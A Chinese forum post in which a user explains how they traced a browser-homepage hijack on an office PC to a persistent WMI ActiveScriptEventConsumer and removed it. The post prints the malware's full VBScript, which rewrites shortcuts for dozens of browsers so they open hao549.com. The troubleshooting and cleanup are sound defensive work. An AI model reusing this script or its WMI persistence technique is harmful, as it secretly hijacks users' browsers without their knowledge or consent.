今天公司财务主管突然问我一个浏览器主页被修改的问题 说找了网管哥们看过了还是没解决 我过去看了一下 财务电脑里除了IE还安装了两个浏览器 UC和360浏览器 快捷方式都被添加了hao549的指向 这里赞一下UC浏览器 因为是UC浏览器主动弹出主页被恶意修改的提示窗 这个问题才被重视起来 同时鄙视一下360安全卫士和金山毒霸，当时财务电脑里这两款软件都正常运行且升级到最新版本 结果是完全无用…… 好了 闲话少叙 开始解决问题 经过网络资料搜索 看到木子李的Blog提到过类似的问题了 原因是通过WMI定时发起的脚本给所有浏览器添加了域名指向 按图索骥下载了WMITool软件 点击左上角register for events，弹出Connect to namespace框，填入“root\subscription” 点击左侧_EventFilter:Name="unown_filter"，再至右侧右键点击ActiveScriptEventConsume r Name="unown"，右键选择view instant properties 查看ScriptText项…… 结果…… 结果没有发现文章中那段VBScript…… 到底是什么情况？？？ 没办法 动用Process Monitor工具追踪了浏览器图标 结果发现确实是有脚本打开了scrcons.exe 跟文章中提到的情况雷同 看来是别的WMI 最后几番查找，终于在root\CIMV2里面揪出了真凶 缘来是在Consumer in root\CIMV2 -> _EventConsumer -> ActiveScriptEventConsumer下 找到ActiveScriptEventConsumer.Name=”VBScriptKids_consumer” 最后是在ScriptText中找到如下代码： [mw_shl_code=javascript,false]On Error Resume Next:Const link = "http://hao549.com/?r=v&m=4":Const link360 = "http://hao549.com/?r=v&m=4&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\tiand\Desktop,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\tiand\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:[/mw_shl_code] 排版后如下： [mw_shl_code=javascript,true]On Error Resume Next Const link = "http://hao549.com/?r=v&m=4" Const link360 = "http://hao549.com/?r=v&m=4&s=3" browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe" lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\tiand\Desktop,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\tiand\AppData\Roaming\Microsoft\Windows\Start Menu\Programs" browsersArr = split(browsers,",") Set oDic = CreateObject("scripting.dictionary") For Each browser In browsersArr oDic.Add LCase(browser), browser Next lnkpathsArr = split(lnkpaths,",") Set oFolders = CreateObject("scripting.dictionary") For Each lnkpath In lnkpathsArr oFolders.Add lnkpath, lnkpath Next Set fso = CreateObject("Scripting.Filesystemobject") Set WshShell = CreateObject("Wscript.Shell") For Each oFolder In oFolders If fso.FolderExists(oFolder) Then For Each file In fso.GetFolder(oFolder).Files If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then Set oShellLink = WshShell.CreateShortcut(file.Path) path = oShellLink.TargetPath name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path) If oDic.Exists(LCase(name)) Then If LCase(name) = LCase("360se.exe") Then oShellLink.Arguments = link360 Else oShellLink.Arguments = link End If If file.Attributes And 1 Then file.Attributes = file.Attributes - 1 End If oShellLink.Save End If End If Next End If Next[/mw_shl_code] 呼~终于找到了 然后以管理员身份运行WMITool程序（wbemeventviewer.exe）进入root\CIMV2 删除恶意脚本 最后把几个浏览器的快捷方式跳转链接删除 问题解决 一个老问题 费这么大劲才解决 请坛里的大神笑笑就好 谢谢大家了